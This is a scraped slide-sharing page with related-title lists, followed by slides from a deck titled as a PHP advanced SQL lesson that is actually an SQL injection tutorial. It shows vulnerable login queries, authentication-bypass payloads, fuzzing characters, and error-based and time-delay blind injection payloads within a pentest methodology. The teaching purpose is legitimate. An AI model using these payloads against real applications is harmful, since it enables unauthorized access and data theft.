C# Advanced L03-XML+LINQ to XMLC# Advanced L03-XML+LINQ to XML
C# Advanced L03-XML+LINQ to XML
 
Transforming xml with XSLT
Transforming  xml with XSLTTransforming  xml with XSLT
Transforming xml with XSLT
 
SQL/XML on Oracle
SQL/XML on OracleSQL/XML on Oracle
SQL/XML on Oracle
 
CSharp Advanced L05-Attributes+Reflection
CSharp Advanced L05-Attributes+ReflectionCSharp Advanced L05-Attributes+Reflection
CSharp Advanced L05-Attributes+Reflection
 
XML on SQL Server
XML on SQL ServerXML on SQL Server
XML on SQL Server
 
Querydsl fin jug - june 2012
Querydsl   fin jug - june 2012Querydsl   fin jug - june 2012
Querydsl fin jug - june 2012
 
eXtensible Markup Language (XML)
eXtensible Markup Language (XML)eXtensible Markup Language (XML)
eXtensible Markup Language (XML)
 
Introduction to XSLT
Introduction to XSLTIntroduction to XSLT
Introduction to XSLT
 
Database Management Homework Help
Database Management Homework Help Database Management Homework Help
Database Management Homework Help
 
Michael Bayer Introduction to SQLAlchemy @ Postgres Open
Michael Bayer Introduction to SQLAlchemy @ Postgres OpenMichael Bayer Introduction to SQLAlchemy @ Postgres Open
Michael Bayer Introduction to SQLAlchemy @ Postgres Open
 
Les01
Les01Les01
Les01
 
Instant DBMS Homework Help
Instant DBMS Homework HelpInstant DBMS Homework Help
Instant DBMS Homework Help
 
Extracting data from xml
Extracting data from xmlExtracting data from xml
Extracting data from xml
 
XMLT
XMLTXMLT
XMLT
 
Code generating beans in Java
Code generating beans in JavaCode generating beans in Java
Code generating beans in Java
 
JavaParser - A tool to generate, analyze and refactor Java code
JavaParser - A tool to generate, analyze and refactor Java codeJavaParser - A tool to generate, analyze and refactor Java code
JavaParser - A tool to generate, analyze and refactor Java code
 

En vedette

Manual de jhon dere serie 300
Manual de jhon dere serie 300Manual de jhon dere serie 300
Manual de jhon dere serie 300Andy Chunga
 
Automotiveairconditioningtrainingmanual
Automotiveairconditioningtrainingmanual Automotiveairconditioningtrainingmanual
Automotiveairconditioningtrainingmanual abrahamjospher
 
eCommerce Warehouse Management System and Robotics
eCommerce Warehouse Management System and RoboticseCommerce Warehouse Management System and Robotics
eCommerce Warehouse Management System and RoboticsXp3rtCM0
 
Oshkosh 1070 f heavy equipment transporter, united kingdom
Oshkosh 1070 f heavy equipment transporter, united kingdomOshkosh 1070 f heavy equipment transporter, united kingdom
Oshkosh 1070 f heavy equipment transporter, united kingdomhindujudaic
 
Railway training report
Railway training reportRailway training report
Railway training reportDeepak kango
 
Automatic car speed +rf control (1)
Automatic car speed +rf control (1)Automatic car speed +rf control (1)
Automatic car speed +rf control (1)Vikrant Verma
 
As9100 interpretations
As9100 interpretationsAs9100 interpretations
As9100 interpretationsoziel2015
 
CEP and SOA: An Open Event-Driven Architecture for Risk Management
CEP and SOA: An Open Event-Driven Architecture for Risk ManagementCEP and SOA: An Open Event-Driven Architecture for Risk Management
CEP and SOA: An Open Event-Driven Architecture for Risk ManagementTim Bass
 
Dematic Logistics Review Volume3
Dematic Logistics Review Volume3Dematic Logistics Review Volume3
Dematic Logistics Review Volume3Joe Bui
 
Value Acceleration Eikenzande
Value Acceleration EikenzandeValue Acceleration Eikenzande
Value Acceleration EikenzandePaul Van Doorn
 
Dematic Logistics Review #5
Dematic Logistics Review #5Dematic Logistics Review #5
Dematic Logistics Review #5hagenbucksw
 
The Skinny on RFID and Automated Materials Handling in Library
The Skinny on RFID and Automated Materials Handling in Library The Skinny on RFID and Automated Materials Handling in Library
The Skinny on RFID and Automated Materials Handling in Library loriayre
 
Aws d1.1. 2002 presentation for ska 2005
Aws d1.1. 2002 presentation for ska 2005 Aws d1.1. 2002 presentation for ska 2005
Aws d1.1. 2002 presentation for ska 2005 Sergey Kobelev
 
Trusted Cloud Management
Trusted Cloud ManagementTrusted Cloud Management
Trusted Cloud ManagementBMC Software
 
Program Manager Resume 4
Program Manager Resume 4Program Manager Resume 4
Program Manager Resume 4Joe Ungvarsky
 
Intelligent Tilt Tray Sorter System by Falcon Autotech
Intelligent Tilt Tray Sorter System by Falcon AutotechIntelligent Tilt Tray Sorter System by Falcon Autotech
Intelligent Tilt Tray Sorter System by Falcon AutotechFalcon Autotech
 

En vedette (20)

Manual de jhon dere serie 300
Manual de jhon dere serie 300Manual de jhon dere serie 300
Manual de jhon dere serie 300
 
Automotiveairconditioningtrainingmanual
Automotiveairconditioningtrainingmanual Automotiveairconditioningtrainingmanual
Automotiveairconditioningtrainingmanual
 
Android - Android Intent Types
Android - Android Intent TypesAndroid - Android Intent Types
Android - Android Intent Types
 
eCommerce Warehouse Management System and Robotics
eCommerce Warehouse Management System and RoboticseCommerce Warehouse Management System and Robotics
eCommerce Warehouse Management System and Robotics
 
Oshkosh 1070 f heavy equipment transporter, united kingdom
Oshkosh 1070 f heavy equipment transporter, united kingdomOshkosh 1070 f heavy equipment transporter, united kingdom
Oshkosh 1070 f heavy equipment transporter, united kingdom
 
Railway training report
Railway training reportRailway training report
Railway training report
 
Automatic car speed +rf control (1)
Automatic car speed +rf control (1)Automatic car speed +rf control (1)
Automatic car speed +rf control (1)
 
As9100 interpretations
As9100 interpretationsAs9100 interpretations
As9100 interpretations
 
Sql server T-sql basics ppt-3
Sql server T-sql basics  ppt-3Sql server T-sql basics  ppt-3
Sql server T-sql basics ppt-3
 
CEP and SOA: An Open Event-Driven Architecture for Risk Management
CEP and SOA: An Open Event-Driven Architecture for Risk ManagementCEP and SOA: An Open Event-Driven Architecture for Risk Management
CEP and SOA: An Open Event-Driven Architecture for Risk Management
 
Dematic Logistics Review Volume3
Dematic Logistics Review Volume3Dematic Logistics Review Volume3
Dematic Logistics Review Volume3
 
Value Acceleration Eikenzande
Value Acceleration EikenzandeValue Acceleration Eikenzande
Value Acceleration Eikenzande
 
Dematic Logistics Review #5
Dematic Logistics Review #5Dematic Logistics Review #5
Dematic Logistics Review #5
 
The Skinny on RFID and Automated Materials Handling in Library
The Skinny on RFID and Automated Materials Handling in Library The Skinny on RFID and Automated Materials Handling in Library
The Skinny on RFID and Automated Materials Handling in Library
 
Aws d1.1. 2002 presentation for ska 2005
Aws d1.1. 2002 presentation for ska 2005 Aws d1.1. 2002 presentation for ska 2005
Aws d1.1. 2002 presentation for ska 2005
 
Trusted Cloud Management
Trusted Cloud ManagementTrusted Cloud Management
Trusted Cloud Management
 
Motor final
Motor finalMotor final
Motor final
 
Program Manager Resume 4
Program Manager Resume 4Program Manager Resume 4
Program Manager Resume 4
 
A_Technology_Based_solution_for_Public_Distribution_System
A_Technology_Based_solution_for_Public_Distribution_SystemA_Technology_Based_solution_for_Public_Distribution_System
A_Technology_Based_solution_for_Public_Distribution_System
 
Intelligent Tilt Tray Sorter System by Falcon Autotech
Intelligent Tilt Tray Sorter System by Falcon AutotechIntelligent Tilt Tray Sorter System by Falcon Autotech
Intelligent Tilt Tray Sorter System by Falcon Autotech
 

Similaire à PHP - Introduction to Advanced SQL

Sql Injection Adv Owasp
Sql Injection Adv OwaspSql Injection Adv Owasp
Sql Injection Adv OwaspAung Khant
 
Advanced SQL Injection
Advanced SQL InjectionAdvanced SQL Injection
Advanced SQL Injectionamiable_indian
 
Advanced sql injection
Advanced sql injectionAdvanced sql injection
Advanced sql injectionbadhanbd
 
[Kerference] Nefarious SQL - 김동호(KERT)
[Kerference] Nefarious SQL - 김동호(KERT)[Kerference] Nefarious SQL - 김동호(KERT)
[Kerference] Nefarious SQL - 김동호(KERT)NAVER D2
 
Owasp Top 10 - A1 Injection
Owasp Top 10 - A1 InjectionOwasp Top 10 - A1 Injection
Owasp Top 10 - A1 InjectionPaul Ionescu
 
Advanced SQL - Database Access from Programming Languages
Advanced SQL - Database Access  from Programming LanguagesAdvanced SQL - Database Access  from Programming Languages
Advanced SQL - Database Access from Programming LanguagesS.Shayan Daneshvar
 
Querying_with_T-SQL_-_01.pptx
Querying_with_T-SQL_-_01.pptxQuerying_with_T-SQL_-_01.pptx
Querying_with_T-SQL_-_01.pptxQuyVo27
 
Oracle Database 12c - New Features for Developers and DBAs
Oracle Database 12c - New Features for Developers and DBAsOracle Database 12c - New Features for Developers and DBAs
Oracle Database 12c - New Features for Developers and DBAsAlex Zaballa
 
Oracle Database 12c - New Features for Developers and DBAs
Oracle Database 12c  - New Features for Developers and DBAsOracle Database 12c  - New Features for Developers and DBAs
Oracle Database 12c - New Features for Developers and DBAsAlex Zaballa
 
Unique Features of SQL Injection in PHP Assignment
Unique Features of SQL Injection in PHP AssignmentUnique Features of SQL Injection in PHP Assignment
Unique Features of SQL Injection in PHP AssignmentLesa Cote
 
pl/sql online Training|sql online Training | iTeknowledge
pl/sql online Training|sql online Training | iTeknowledgepl/sql online Training|sql online Training | iTeknowledge
pl/sql online Training|sql online Training | iTeknowledgeMasood Khan
 
Web hacking series part 3
Web hacking series part 3Web hacking series part 3
Web hacking series part 3Aditya Kamat
 
Find Anything In Your APEX App - Fuzzy Search with Oracle Text
Find Anything In Your APEX App - Fuzzy Search with Oracle TextFind Anything In Your APEX App - Fuzzy Search with Oracle Text
Find Anything In Your APEX App - Fuzzy Search with Oracle TextCarsten Czarski
 
Hack your db before the hackers do
Hack your db before the hackers doHack your db before the hackers do
Hack your db before the hackers dofangjiafu
 

Similaire à PHP - Introduction to Advanced SQL (20)

Sql Injection Adv Owasp
Sql Injection Adv OwaspSql Injection Adv Owasp
Sql Injection Adv Owasp
 
Advanced SQL Injection
Advanced SQL InjectionAdvanced SQL Injection
Advanced SQL Injection
 
Advanced sql injection
Advanced sql injectionAdvanced sql injection
Advanced sql injection
 
[Kerference] Nefarious SQL - 김동호(KERT)
[Kerference] Nefarious SQL - 김동호(KERT)[Kerference] Nefarious SQL - 김동호(KERT)
[Kerference] Nefarious SQL - 김동호(KERT)
 
Owasp Top 10 - A1 Injection
Owasp Top 10 - A1 InjectionOwasp Top 10 - A1 Injection
Owasp Top 10 - A1 Injection
 
Advanced SQL - Database Access from Programming Languages
Advanced SQL - Database Access  from Programming LanguagesAdvanced SQL - Database Access  from Programming Languages
Advanced SQL - Database Access from Programming Languages
 
Querying_with_T-SQL_-_01.pptx
Querying_with_T-SQL_-_01.pptxQuerying_with_T-SQL_-_01.pptx
Querying_with_T-SQL_-_01.pptx
 
Oracle Database 12c - New Features for Developers and DBAs
Oracle Database 12c - New Features for Developers and DBAsOracle Database 12c - New Features for Developers and DBAs
Oracle Database 12c - New Features for Developers and DBAs
 
Oracle Database 12c - New Features for Developers and DBAs
Oracle Database 12c  - New Features for Developers and DBAsOracle Database 12c  - New Features for Developers and DBAs
Oracle Database 12c - New Features for Developers and DBAs
 
IR SQLite Session #1
IR SQLite Session #1IR SQLite Session #1
IR SQLite Session #1
 
Sql injection
Sql injectionSql injection
Sql injection
 
Unique Features of SQL Injection in PHP Assignment
Unique Features of SQL Injection in PHP AssignmentUnique Features of SQL Injection in PHP Assignment
Unique Features of SQL Injection in PHP Assignment
 
SQL Injection
SQL InjectionSQL Injection
SQL Injection
 
pl/sql online Training|sql online Training | iTeknowledge
pl/sql online Training|sql online Training | iTeknowledgepl/sql online Training|sql online Training | iTeknowledge
pl/sql online Training|sql online Training | iTeknowledge
 
Web hacking series part 3
Web hacking series part 3Web hacking series part 3
Web hacking series part 3
 
Advanced sql injection 1
Advanced sql injection 1Advanced sql injection 1
Advanced sql injection 1
 
Find Anything In Your APEX App - Fuzzy Search with Oracle Text
Find Anything In Your APEX App - Fuzzy Search with Oracle TextFind Anything In Your APEX App - Fuzzy Search with Oracle Text
Find Anything In Your APEX App - Fuzzy Search with Oracle Text
 
Day 6.pptx
Day 6.pptxDay 6.pptx
Day 6.pptx
 
10 sql tips
10 sql tips10 sql tips
10 sql tips
 
Hack your db before the hackers do
Hack your db before the hackers doHack your db before the hackers do
Hack your db before the hackers do
 

Plus de Vibrant Technologies & Computers

Data ware housing - Introduction to data ware housing process.
Data ware housing - Introduction to data ware housing process.Data ware housing - Introduction to data ware housing process.
Data ware housing - Introduction to data ware housing process.Vibrant Technologies & Computers
 

Plus de Vibrant Technologies & Computers (20)

Buisness analyst business analysis overview ppt 5
Buisness analyst business analysis overview ppt 5Buisness analyst business analysis overview ppt 5
Buisness analyst business analysis overview ppt 5
 
SQL Introduction to displaying data from multiple tables
SQL Introduction to displaying data from multiple tables  SQL Introduction to displaying data from multiple tables
SQL Introduction to displaying data from multiple tables
 
SQL- Introduction to MySQL
SQL- Introduction to MySQLSQL- Introduction to MySQL
SQL- Introduction to MySQL
 
SQL- Introduction to SQL database
SQL- Introduction to SQL database SQL- Introduction to SQL database
SQL- Introduction to SQL database
 
ITIL - introduction to ITIL
ITIL - introduction to ITILITIL - introduction to ITIL
ITIL - introduction to ITIL
 
Salesforce - Introduction to Security & Access
Salesforce -  Introduction to Security & Access Salesforce -  Introduction to Security & Access
Salesforce - Introduction to Security & Access
 
Data ware housing- Introduction to olap .
Data ware housing- Introduction to  olap .Data ware housing- Introduction to  olap .
Data ware housing- Introduction to olap .
 
Data ware housing - Introduction to data ware housing process.
Data ware housing - Introduction to data ware housing process.Data ware housing - Introduction to data ware housing process.
Data ware housing - Introduction to data ware housing process.
 
Data ware housing- Introduction to data ware housing
Data ware housing- Introduction to data ware housingData ware housing- Introduction to data ware housing
Data ware housing- Introduction to data ware housing
 
Salesforce - classification of cloud computing
Salesforce - classification of cloud computingSalesforce - classification of cloud computing
Salesforce - classification of cloud computing
 
Salesforce - cloud computing fundamental
Salesforce - cloud computing fundamentalSalesforce - cloud computing fundamental
Salesforce - cloud computing fundamental
 
SQL- Introduction to PL/SQL
SQL- Introduction to  PL/SQLSQL- Introduction to  PL/SQL
SQL- Introduction to PL/SQL
 
SQL- Introduction to advanced sql concepts
SQL- Introduction to  advanced sql conceptsSQL- Introduction to  advanced sql concepts
SQL- Introduction to advanced sql concepts
 
SQL Inteoduction to SQL manipulating of data
SQL Inteoduction to SQL manipulating of data   SQL Inteoduction to SQL manipulating of data
SQL Inteoduction to SQL manipulating of data
 
SQL- Introduction to SQL Set Operations
SQL- Introduction to SQL Set OperationsSQL- Introduction to SQL Set Operations
SQL- Introduction to SQL Set Operations
 
Sas - Introduction to designing the data mart
Sas - Introduction to designing the data martSas - Introduction to designing the data mart
Sas - Introduction to designing the data mart
 
Sas - Introduction to working under change management
Sas - Introduction to working under change managementSas - Introduction to working under change management
Sas - Introduction to working under change management
 
SAS - overview of SAS
SAS - overview of SASSAS - overview of SAS
SAS - overview of SAS
 
Teradata - Architecture of Teradata
Teradata - Architecture of TeradataTeradata - Architecture of Teradata
Teradata - Architecture of Teradata
 
Teradata - Restoring Data
Teradata - Restoring Data Teradata - Restoring Data
Teradata - Restoring Data
 

Dernier

AI You Can Trust - Ensuring Success with Data Integrity Webinar
AI You Can Trust - Ensuring Success with Data Integrity WebinarAI You Can Trust - Ensuring Success with Data Integrity Webinar
AI You Can Trust - Ensuring Success with Data Integrity WebinarPrecisely
 
COMPUTER 10: Lesson 7 - File Storage and Online Collaboration
COMPUTER 10: Lesson 7 - File Storage and Online CollaborationCOMPUTER 10: Lesson 7 - File Storage and Online Collaboration
COMPUTER 10: Lesson 7 - File Storage and Online Collaborationbruanjhuli
 
Building AI-Driven Apps Using Semantic Kernel.pptx
Building AI-Driven Apps Using Semantic Kernel.pptxBuilding AI-Driven Apps Using Semantic Kernel.pptx
Building AI-Driven Apps Using Semantic Kernel.pptxUdaiappa Ramachandran
 
9 Steps For Building Winning Founding Team
9 Steps For Building Winning Founding Team9 Steps For Building Winning Founding Team
9 Steps For Building Winning Founding TeamAdam Moalla
 
Videogame localization & technology_ how to enhance the power of translation.pdf
Videogame localization & technology_ how to enhance the power of translation.pdfVideogame localization & technology_ how to enhance the power of translation.pdf
Videogame localization & technology_ how to enhance the power of translation.pdfinfogdgmi
 
UiPath Studio Web workshop series - Day 6
UiPath Studio Web workshop series - Day 6UiPath Studio Web workshop series - Day 6
UiPath Studio Web workshop series - Day 6DianaGray10
 
IESVE Software for Florida Code Compliance Using ASHRAE 90.1-2019
IESVE Software for Florida Code Compliance Using ASHRAE 90.1-2019IESVE Software for Florida Code Compliance Using ASHRAE 90.1-2019
IESVE Software for Florida Code Compliance Using ASHRAE 90.1-2019IES VE
 
Using IESVE for Loads, Sizing and Heat Pump Modeling to Achieve Decarbonization
Using IESVE for Loads, Sizing and Heat Pump Modeling to Achieve DecarbonizationUsing IESVE for Loads, Sizing and Heat Pump Modeling to Achieve Decarbonization
Using IESVE for Loads, Sizing and Heat Pump Modeling to Achieve DecarbonizationIES VE
 
Secure your environment with UiPath and CyberArk technologies - Session 1
Secure your environment with UiPath and CyberArk technologies - Session 1Secure your environment with UiPath and CyberArk technologies - Session 1
Secure your environment with UiPath and CyberArk technologies - Session 1DianaGray10
 
Basic Building Blocks of Internet of Things.
Basic Building Blocks of Internet of Things.Basic Building Blocks of Internet of Things.
Basic Building Blocks of Internet of Things.YounusS2
 
UiPath Platform: The Backend Engine Powering Your Automation - Session 1
UiPath Platform: The Backend Engine Powering Your Automation - Session 1UiPath Platform: The Backend Engine Powering Your Automation - Session 1
UiPath Platform: The Backend Engine Powering Your Automation - Session 1DianaGray10
 
UiPath Solutions Management Preview - Northern CA Chapter - March 22.pdf
UiPath Solutions Management Preview - Northern CA Chapter - March 22.pdfUiPath Solutions Management Preview - Northern CA Chapter - March 22.pdf
UiPath Solutions Management Preview - Northern CA Chapter - March 22.pdfDianaGray10
 
Computer 10: Lesson 10 - Online Crimes and Hazards
Computer 10: Lesson 10 - Online Crimes and HazardsComputer 10: Lesson 10 - Online Crimes and Hazards
Computer 10: Lesson 10 - Online Crimes and HazardsSeth Reyes
 
IaC & GitOps in a Nutshell - a FridayInANuthshell Episode.pdf
IaC & GitOps in a Nutshell - a FridayInANuthshell Episode.pdfIaC & GitOps in a Nutshell - a FridayInANuthshell Episode.pdf
IaC & GitOps in a Nutshell - a FridayInANuthshell Episode.pdfDaniel Santiago Silva Capera
 
Salesforce Miami User Group Event - 1st Quarter 2024
Salesforce Miami User Group Event - 1st Quarter 2024Salesforce Miami User Group Event - 1st Quarter 2024
Salesforce Miami User Group Event - 1st Quarter 2024SkyPlanner
 
Apres-Cyber - The Data Dilemma: Bridging Offensive Operations and Machine Lea...
Apres-Cyber - The Data Dilemma: Bridging Offensive Operations and Machine Lea...Apres-Cyber - The Data Dilemma: Bridging Offensive Operations and Machine Lea...
Apres-Cyber - The Data Dilemma: Bridging Offensive Operations and Machine Lea...Will Schroeder
 
Artificial Intelligence & SEO Trends for 2024
Artificial Intelligence & SEO Trends for 2024Artificial Intelligence & SEO Trends for 2024
Artificial Intelligence & SEO Trends for 2024D Cloud Solutions
 
NIST Cybersecurity Framework (CSF) 2.0 Workshop
NIST Cybersecurity Framework (CSF) 2.0 WorkshopNIST Cybersecurity Framework (CSF) 2.0 Workshop
NIST Cybersecurity Framework (CSF) 2.0 WorkshopBachir Benyammi
 
Bird eye's view on Camunda open source ecosystem
Bird eye's view on Camunda open source ecosystemBird eye's view on Camunda open source ecosystem
Bird eye's view on Camunda open source ecosystemAsko Soukka
 

Dernier (20)

AI You Can Trust - Ensuring Success with Data Integrity Webinar
AI You Can Trust - Ensuring Success with Data Integrity WebinarAI You Can Trust - Ensuring Success with Data Integrity Webinar
AI You Can Trust - Ensuring Success with Data Integrity Webinar
 
COMPUTER 10: Lesson 7 - File Storage and Online Collaboration
COMPUTER 10: Lesson 7 - File Storage and Online CollaborationCOMPUTER 10: Lesson 7 - File Storage and Online Collaboration
COMPUTER 10: Lesson 7 - File Storage and Online Collaboration
 
Building AI-Driven Apps Using Semantic Kernel.pptx
Building AI-Driven Apps Using Semantic Kernel.pptxBuilding AI-Driven Apps Using Semantic Kernel.pptx
Building AI-Driven Apps Using Semantic Kernel.pptx
 
9 Steps For Building Winning Founding Team
9 Steps For Building Winning Founding Team9 Steps For Building Winning Founding Team
9 Steps For Building Winning Founding Team
 
Videogame localization & technology_ how to enhance the power of translation.pdf
Videogame localization & technology_ how to enhance the power of translation.pdfVideogame localization & technology_ how to enhance the power of translation.pdf
Videogame localization & technology_ how to enhance the power of translation.pdf
 
20230104 - machine vision
20230104 - machine vision20230104 - machine vision
20230104 - machine vision
 
UiPath Studio Web workshop series - Day 6
UiPath Studio Web workshop series - Day 6UiPath Studio Web workshop series - Day 6
UiPath Studio Web workshop series - Day 6
 
IESVE Software for Florida Code Compliance Using ASHRAE 90.1-2019
IESVE Software for Florida Code Compliance Using ASHRAE 90.1-2019IESVE Software for Florida Code Compliance Using ASHRAE 90.1-2019
IESVE Software for Florida Code Compliance Using ASHRAE 90.1-2019
 
Using IESVE for Loads, Sizing and Heat Pump Modeling to Achieve Decarbonization
Using IESVE for Loads, Sizing and Heat Pump Modeling to Achieve DecarbonizationUsing IESVE for Loads, Sizing and Heat Pump Modeling to Achieve Decarbonization
Using IESVE for Loads, Sizing and Heat Pump Modeling to Achieve Decarbonization
 
Secure your environment with UiPath and CyberArk technologies - Session 1
Secure your environment with UiPath and CyberArk technologies - Session 1Secure your environment with UiPath and CyberArk technologies - Session 1
Secure your environment with UiPath and CyberArk technologies - Session 1
 
Basic Building Blocks of Internet of Things.
Basic Building Blocks of Internet of Things.Basic Building Blocks of Internet of Things.
Basic Building Blocks of Internet of Things.
 
UiPath Platform: The Backend Engine Powering Your Automation - Session 1
UiPath Platform: The Backend Engine Powering Your Automation - Session 1UiPath Platform: The Backend Engine Powering Your Automation - Session 1
UiPath Platform: The Backend Engine Powering Your Automation - Session 1
 
UiPath Solutions Management Preview - Northern CA Chapter - March 22.pdf
UiPath Solutions Management Preview - Northern CA Chapter - March 22.pdfUiPath Solutions Management Preview - Northern CA Chapter - March 22.pdf
UiPath Solutions Management Preview - Northern CA Chapter - March 22.pdf
 
Computer 10: Lesson 10 - Online Crimes and Hazards
Computer 10: Lesson 10 - Online Crimes and HazardsComputer 10: Lesson 10 - Online Crimes and Hazards
Computer 10: Lesson 10 - Online Crimes and Hazards
 
IaC & GitOps in a Nutshell - a FridayInANuthshell Episode.pdf
IaC & GitOps in a Nutshell - a FridayInANuthshell Episode.pdfIaC & GitOps in a Nutshell - a FridayInANuthshell Episode.pdf
IaC & GitOps in a Nutshell - a FridayInANuthshell Episode.pdf
 
Salesforce Miami User Group Event - 1st Quarter 2024
Salesforce Miami User Group Event - 1st Quarter 2024Salesforce Miami User Group Event - 1st Quarter 2024
Salesforce Miami User Group Event - 1st Quarter 2024
 
Apres-Cyber - The Data Dilemma: Bridging Offensive Operations and Machine Lea...
Apres-Cyber - The Data Dilemma: Bridging Offensive Operations and Machine Lea...Apres-Cyber - The Data Dilemma: Bridging Offensive Operations and Machine Lea...
Apres-Cyber - The Data Dilemma: Bridging Offensive Operations and Machine Lea...
 
Artificial Intelligence & SEO Trends for 2024
Artificial Intelligence & SEO Trends for 2024Artificial Intelligence & SEO Trends for 2024
Artificial Intelligence & SEO Trends for 2024
 
NIST Cybersecurity Framework (CSF) 2.0 Workshop
NIST Cybersecurity Framework (CSF) 2.0 WorkshopNIST Cybersecurity Framework (CSF) 2.0 Workshop
NIST Cybersecurity Framework (CSF) 2.0 Workshop
 
Bird eye's view on Camunda open source ecosystem
Bird eye's view on Camunda open source ecosystemBird eye's view on Camunda open source ecosystem
Bird eye's view on Camunda open source ecosystem
 

PHP - Introduction to Advanced SQL

  • 3. What is SQL?What is SQL? • SQL stands for Structured Query Language • Allows us to access a database • ANSI and ISO standard computer language o The most current standard is SQL99 • SQL can: o execute queries against a database o retrieve data from a database o insert new records in a database o delete records from a database o update records in a database
  • 4. SQL is a Standard - but...SQL is a Standard - but... • There are many different versions of the SQL language • They support the same major keywords in a similar manner (such as SELECT, UPDATE, DELETE, INSERT, WHERE, and others). • Most of the SQL database programs also have their own proprietary extensions in addition to the SQL standard!
  • 5. SQL Database TablesSQL Database Tables • A relational database contains one or more tables identified each by a name • Tables contain records (rows) with data • For example, the following table is called "users" and contains data distributed in rows and columns: userID Name LastName Login Password 1 John Smith jsmith hello 2 Adam Taylor adamt qwerty 3 Daniel Thompson dthompson dthompson
  • 6. SQL QueriesSQL Queries • With SQL, we can query a database and have a result set returned • Using the previous table, a query like this: SELECT LastName FROM users WHERE UserID = 1; • Gives a result set like this: LastName -------------- Smith
  • 7. SQL Data ManipulationSQL Data Manipulation Language (DML)Language (DML) • SQL includes a syntax to update, insert, and delete records: o SELECT - extracts data o UPDATE - updates data o INSERT INTO - inserts new data o DELETE - deletes data
  • 8. SQL Data DefinitionSQL Data Definition Language (DDL)Language (DDL) • The Data Definition Language (DDL) part of SQL permits: o Database tables to be created or deleted o Define indexes (keys) o Specify links between tables o Impose constraints between database tables • Some of the most commonly used DDL statements in SQL are: o CREATE TABLE - creates a new database table o ALTER TABLE - alters (changes) a database table o DROP TABLE - deletes a database table
  • 9. MetadataMetadata • Almost all SQL databases are based on the RDBM (Relational Database Model) • One important fact for SQL Injection o Amongst Codd's 12 rules for a Truly Relational Database System: 4. Metadata (data about the database) must be stored in the database just as regular data is o Therefore, database structure can also be read and altered with SQL queries
  • 10. What is SQL Injection?What is SQL Injection? The ability to inject SQL commands into the database engine through an existing application
  • 11. How common is it?How common is it? • It is probably the most common Website vulnerability today! • It is a flaw in "web application" development, it is not a DB or web server problem o Most programmers are still not aware of this problem o A lot of the tutorials & demo “templates” are vulnerable o Even worse, a lot of solutions posted on the Internet are not good enough • In our pen tests over 60% of our clients turn out to be vulnerable to SQL Injection
  • 12. Vulnerable ApplicationsVulnerable Applications • Almost all SQL databases and programming languages are potentially vulnerable o MS SQL Server, Oracle, MySQL, Postgres, DB2, MS Access, Sybase, Informix, etc • Accessed through applications developed using: o Perl and CGI scripts that access databases o ASP, JSP, PHP o XML, XSL and XSQL o Javascript o VB, MFC, and other ODBC-based tools and APIs o DB specific Web-based applications and API’s o Reports and DB Applications o 3 and 4GL-based languages (C, OCI, Pro*C, and COBOL) o many more
  • 13. How does SQL InjectionHow does SQL Injection work?work? Common vulnerable login query SELECT * FROM users WHERE login = 'victor' AND password = '123' (If it returns something then login!) ASP/MS SQL Server login syntax var sql = "SELECT * FROM users WHERE login = '" + formusr + "' AND password = '" + formpwd + "'";
  • 14. Injecting through StringsInjecting through Strings formusr = ' or 1=1 – – formpwd = anything Final query would look like this: SELECT * FROM users WHERE username = ' ' or 1=1 – – AND password = 'anything'
  • 15. The power of 'The power of ' • It closes the string parameter • Everything after is considered part of the SQL command • Misleading Internet suggestions include: o Escape it! : replace ' with ' ' • String fields are very common but there are other types of fields: o Numeric o Dates
  • 16. If it were numeric?If it were numeric? SELECT * FROM clients WHERE account = 12345678 AND pin = 1111 PHP/MySQL login syntax $sql = "SELECT * FROM clients WHERE " . "account = $formacct AND " . "pin = $formpin";
  • 17. Injecting Numeric FieldsInjecting Numeric Fields $formacct = 1 or 1=1 # $formpin = 1111 Final query would look like this: SELECT * FROM clients WHERE account = 1 or 1=1 # AND pin = 1111
  • 18. SQL Injection CharactersSQL Injection Characters • ' or " character String Indicators • -- or # single-line comment • /*…*/ multiple-line comment • + addition, concatenate (or space in url) • || (double pipe) concatenate • % wildcard attribute indicator • ?Param1=foo&Param2=bar URL Parameters • PRINT useful as non transactional command • @variablelocal variable • @@variable global variable • waitfor delay '0:0:10' time delay
  • 20. SQL Injection Testing MethodologySQL Injection Testing Methodology 1) Input Validation 2) Info. Gathering 6) OS Cmd Prompt 7) Expand Influence 4) Extracting Data 3) 1=1 Attacks 5) OS Interaction
  • 21. 1) Input Validation1) Input Validation 2) Info. Gathering 3) 1=1 Attacks 5) OS Interaction 6) OS Cmd Prompt4) Extracting Data 7) Expand Influence 1) Input Validation
  • 22. Discovery ofDiscovery of VulnerabilitiesVulnerabilities • Vulnerabilities can be anywhere, we check all entry points: o Fields in web forms o Script parameters in URL query strings o Values stored in cookies or hidden fields • By "fuzzing" we insert into every one: o Character sequence: ' " ) # || + > o SQL reserved words with white space delimiters • %09select (tab%09, carriage return%13, linefeed%10 and space%32 with and, or, update, insert, exec, etc) o Delay query ' waitfor delay '0:0:10'--
  • 23. 2) Information Gathering2) Information Gathering 2) Info. Gathering 3) 1=1 Attacks 5) OS Interaction 6) OS Cmd Prompt4) Extracting Data 7) Expand Influence 1) Input Validation
  • 24. 2) Information Gathering2) Information Gathering • We will try to find out the following: a) Output mechanism b) Understand the query c) Determine database type d) Find out user privilege level e) Determine OS interaction level
  • 25. a) Exploring Outputa) Exploring Output MechanismsMechanisms 1. Using query result sets in the web application 2. Error Messages o Craft SQL queries that generate specific types of error messages with valuable info in them 1. Blind SQL Injection o Use time delays or error signatures to determine extract information o Almost the same things can be done but Blind Injection is much slower and more difficult 1. Other mechanisms o e-mail, SMB, FTP, TFTP
  • 26. Extracting informationExtracting information through Error Messagesthrough Error Messages • Grouping Error  ' group by columnnames having 1=1 - - • Type Mismatch o ' union select 1,1,'text',1,1,1 - - o ' union select 1,1, bigint,1,1,1 - - • Where 'text' or bigint are being united into an int column o In DBs that allow subqueries, a better way is: • ' and 1 in (select 'text' ) - - o In some cases we may need to CAST or CONVERT our data to generate the error messages
  • 27. Blind InjectionBlind Injection • We can use different known outcomes o ' and condition and '1'='1 • Or we can use if statements o '; if condition waitfor delay '0:0:5' -- o '; union select if( condition , benchmark (100000, sha1('test')), 'false' ),1,1,1,1; • Additionally, we can run all types of queries but with no debugging information! • We get yes/no responses only o We can extract ASCII a bit at a time... o Very noisy and time consuming but possible with automated tools like SQueaL
  • 28. b) Understanding theb) Understanding the QueryQuery • The query can be: o SELECT o UPDATE o EXEC o INSERT o Or something more complex • Context helps o What is the form or page trying to do with our input? o What is the name of the field, cookie or parameter?
